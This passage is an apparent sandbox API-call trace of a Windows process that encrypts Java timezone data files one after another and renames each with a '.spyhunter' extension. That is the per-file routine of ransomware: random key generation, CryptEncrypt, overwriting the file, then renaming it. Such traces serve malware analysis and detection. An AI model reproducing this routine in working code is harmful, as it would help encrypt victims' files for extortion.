hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0168.002] GetProcessHeap () returned 0x2c0000 [0168.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.002] GetProcessHeap () returned 0x2c0000 [0168.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2a40 | out: hHeap=0x2c0000) returned 1 [0168.002] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6c0 | out: pbBuffer=0x57e6c0) returned 1 [0168.003] GetProcessHeap () returned 0x2c0000 [0168.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.003] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6b8*=0x30) returned 1 [0168.003] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Samara" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\samara"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.003] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Samara") returned 57 [0168.003] StrStrW (lpFirst="Samara", lpSrch=".txt") returned 0x0 [0168.003] GetProcessHeap () returned 0x2c0000 [0168.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0168.003] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e67c*=0x245, lpOverlapped=0x0) returned 1 [0168.004] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffdbb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.004] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x245, lpNumberOfBytesWritten=0x57e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e67c*=0x245, lpOverlapped=0x0) returned 1 [0168.004] GetProcessHeap () returned 0x2c0000 [0168.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0168.004] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.005] WriteFile (in: hFile=0xb0, lpBuffer=0x57e6bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e67c, lpOverlapped=0x0 | out: lpBuffer=0x57e6bc*, lpNumberOfBytesWritten=0x57e67c*=0x4, lpOverlapped=0x0) returned 1 [0168.005] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e67c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e67c*=0x30, lpOverlapped=0x0) returned 1 [0168.005] CloseHandle (hObject=0xb0) returned 1 [0168.005] GetProcessHeap () returned 0x2c0000 [0168.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0168.005] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Samara.spyhunter") returned 67 [0168.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Samara" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\samara"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Samara.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\samara.spyhunter")) returned 1 [0168.017] GetProcessHeap () returned 0x2c0000 [0168.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0168.017] GetProcessHeap () returned 0x2c0000 [0168.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.017] GetProcessHeap () returned 0x2c0000 [0168.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2800 | out: hHeap=0x2c0000) returned 1 [0168.017] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6b8 | out: pbBuffer=0x57e6b8) returned 1 [0168.018] GetProcessHeap () returned 0x2c0000 [0168.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.018] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6b0*=0x30) returned 1 [0168.018] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Riga" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\riga"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.019] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Riga") returned 55 [0168.019] StrStrW (lpFirst="Riga", lpSrch=".txt") returned 0x0 [0168.019] GetProcessHeap () returned 0x2c0000 [0168.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.019] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e674, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e674*=0x454, lpOverlapped=0x0) returned 1 [0168.107] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffbac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.107] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x454, lpNumberOfBytesWritten=0x57e674, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e674*=0x454, lpOverlapped=0x0) returned 1 [0168.107] GetProcessHeap () returned 0x2c0000 [0168.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.107] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.107] WriteFile (in: hFile=0xb0, lpBuffer=0x57e6b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e674, lpOverlapped=0x0 | out: lpBuffer=0x57e6b4*, lpNumberOfBytesWritten=0x57e674*=0x4, lpOverlapped=0x0) returned 1 [0168.107] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e674, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e674*=0x30, lpOverlapped=0x0) returned 1 [0168.107] CloseHandle (hObject=0xb0) returned 1 [0168.108] GetProcessHeap () returned 0x2c0000 [0168.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0168.108] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Riga.spyhunter") returned 65 [0168.108] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Riga" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\riga"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Riga.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\riga.spyhunter")) returned 1 [0168.109] GetProcessHeap () returned 0x2c0000 [0168.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0168.109] GetProcessHeap () returned 0x2c0000 [0168.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.109] GetProcessHeap () returned 0x2c0000 [0168.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec07e8 | out: hHeap=0x2c0000) returned 1 [0168.109] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6b8 | out: pbBuffer=0x57e6b8) returned 1 [0168.109] GetProcessHeap () returned 0x2c0000 [0168.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.109] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6b0*=0x30) returned 1 [0168.109] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Moscow" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\moscow"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.118] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Moscow") returned 57 [0168.118] StrStrW (lpFirst="Moscow", lpSrch=".txt") returned 0x0 [0168.118] GetProcessHeap () returned 0x2c0000 [0168.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.119] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e674, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e674*=0x2b5, lpOverlapped=0x0) returned 1 [0168.119] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffd4b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.119] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2b5, lpNumberOfBytesWritten=0x57e674, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e674*=0x2b5, lpOverlapped=0x0) returned 1 [0168.119] GetProcessHeap () returned 0x2c0000 [0168.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.120] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.120] WriteFile (in: hFile=0xb0, lpBuffer=0x57e6b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e674, lpOverlapped=0x0 | out: lpBuffer=0x57e6b4*, lpNumberOfBytesWritten=0x57e674*=0x4, lpOverlapped=0x0) returned 1 [0168.120] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e674, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e674*=0x30, lpOverlapped=0x0) returned 1 [0168.120] CloseHandle (hObject=0xb0) returned 1 [0168.120] GetProcessHeap () returned 0x2c0000 [0168.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0168.120] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Moscow.spyhunter") returned 67 [0168.120] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Moscow" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\moscow"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Moscow.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\moscow.spyhunter")) returned 1 [0168.121] GetProcessHeap () returned 0x2c0000 [0168.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0168.121] GetProcessHeap () returned 0x2c0000 [0168.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.121] GetProcessHeap () returned 0x2c0000 [0168.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec25c0 | out: hHeap=0x2c0000) returned 1 [0168.121] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6b0 | out: pbBuffer=0x57e6b0) returned 1 [0168.121] GetProcessHeap () returned 0x2c0000 [0168.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.122] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6a8*=0x30) returned 1 [0168.122] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Monaco" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\monaco"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.122] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Monaco") returned 57 [0168.122] StrStrW (lpFirst="Monaco", lpSrch=".txt") returned 0x0 [0168.122] GetProcessHeap () returned 0x2c0000 [0168.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.122] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e66c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e66c*=0x628, lpOverlapped=0x0) returned 1 [0168.123] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff9d8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.124] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x628, lpNumberOfBytesWritten=0x57e66c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e66c*=0x628, lpOverlapped=0x0) returned 1 [0168.124] GetProcessHeap () returned 0x2c0000 [0168.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.124] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.124] WriteFile (in: hFile=0xb0, lpBuffer=0x57e6ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e66c, lpOverlapped=0x0 | out: lpBuffer=0x57e6ac*, lpNumberOfBytesWritten=0x57e66c*=0x4, lpOverlapped=0x0) returned 1 [0168.124] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e66c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e66c*=0x30, lpOverlapped=0x0) returned 1 [0168.124] CloseHandle (hObject=0xb0) returned 1 [0168.124] GetProcessHeap () returned 0x2c0000 [0168.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0168.124] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Monaco.spyhunter") returned 67 [0168.124] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Monaco" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\monaco"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Monaco.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\monaco.spyhunter")) returned 1 [0168.125] GetProcessHeap () returned 0x2c0000 [0168.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0168.125] GetProcessHeap () returned 0x2c0000 [0168.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.125] GetProcessHeap () returned 0x2c0000 [0168.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9880 | out: hHeap=0x2c0000) returned 1 [0168.125] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6b0 | out: pbBuffer=0x57e6b0) returned 1 [0168.125] GetProcessHeap () returned 0x2c0000 [0168.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.125] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6a8*=0x30) returned 1 [0168.125] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Minsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\minsk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.126] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Minsk") returned 56 [0168.126] StrStrW (lpFirst="Minsk", lpSrch=".txt") returned 0x0 [0168.126] GetProcessHeap () returned 0x2c0000 [0168.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.127] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e66c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e66c*=0x25d, lpOverlapped=0x0) returned 1 [0168.127] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffda3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.127] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x25d, lpNumberOfBytesWritten=0x57e66c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e66c*=0x25d, lpOverlapped=0x0) returned 1 [0168.127] GetProcessHeap () returned 0x2c0000 [0168.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.127] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.128] WriteFile (in: hFile=0xb0, lpBuffer=0x57e6ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e66c, lpOverlapped=0x0 | out: lpBuffer=0x57e6ac*, lpNumberOfBytesWritten=0x57e66c*=0x4, lpOverlapped=0x0) returned 1 [0168.128] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e66c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e66c*=0x30, lpOverlapped=0x0) returned 1 [0168.128] CloseHandle (hObject=0xb0) returned 1 [0168.128] GetProcessHeap () returned 0x2c0000 [0168.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0168.128] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Minsk.spyhunter") returned 66 [0168.128] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Minsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\minsk"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Minsk.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\minsk.spyhunter")) returned 1 [0168.292] GetProcessHeap () returned 0x2c0000 [0168.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0168.292] GetProcessHeap () returned 0x2c0000 [0168.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.293] GetProcessHeap () returned 0x2c0000 [0168.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9a00 | out: hHeap=0x2c0000) returned 1 [0168.293] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6a8 | out: pbBuffer=0x57e6a8) returned 1 [0168.293] GetProcessHeap () returned 0x2c0000 [0168.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.293] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6a0*=0x30) returned 1 [0168.293] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Luxembourg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\luxembourg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.297] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Luxembourg") returned 61 [0168.297] StrStrW (lpFirst="Luxembourg", lpSrch=".txt") returned 0x0 [0168.297] GetProcessHeap () returned 0x2c0000 [0168.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.297] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e664, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e664*=0x620, lpOverlapped=0x0) returned 1 [0168.344] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff9e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.344] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x57e664, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e664*=0x620, lpOverlapped=0x0) returned 1 [0168.344] GetProcessHeap () returned 0x2c0000 [0168.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.344] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.344] WriteFile (in: hFile=0xb0, lpBuffer=0x57e6a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e664, lpOverlapped=0x0 | out: lpBuffer=0x57e6a4*, lpNumberOfBytesWritten=0x57e664*=0x4, lpOverlapped=0x0) returned 1 [0168.345] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e664, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e664*=0x30, lpOverlapped=0x0) returned 1 [0168.345] CloseHandle (hObject=0xb0) returned 1 [0168.345] GetProcessHeap () returned 0x2c0000 [0168.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.345] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Luxembourg.spyhunter") returned 71 [0168.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Luxembourg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\luxembourg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Luxembourg.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\luxembourg.spyhunter")) returned 1 [0168.346] GetProcessHeap () returned 0x2c0000 [0168.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.347] GetProcessHeap () returned 0x2c0000 [0168.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.347] GetProcessHeap () returned 0x2c0000 [0168.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebc118 | out: hHeap=0x2c0000) returned 1 [0168.347] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6a8 | out: pbBuffer=0x57e6a8) returned 1 [0168.347] GetProcessHeap () returned 0x2c0000 [0168.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.347] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6a0*=0x30) returned 1 [0168.347] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Lisbon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\lisbon"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.361] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Lisbon") returned 57 [0168.361] StrStrW (lpFirst="Lisbon", lpSrch=".txt") returned 0x0 [0168.361] GetProcessHeap () returned 0x2c0000 [0168.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.361] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e664, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e664*=0x74c, lpOverlapped=0x0) returned 1 [0168.370] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff8b4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 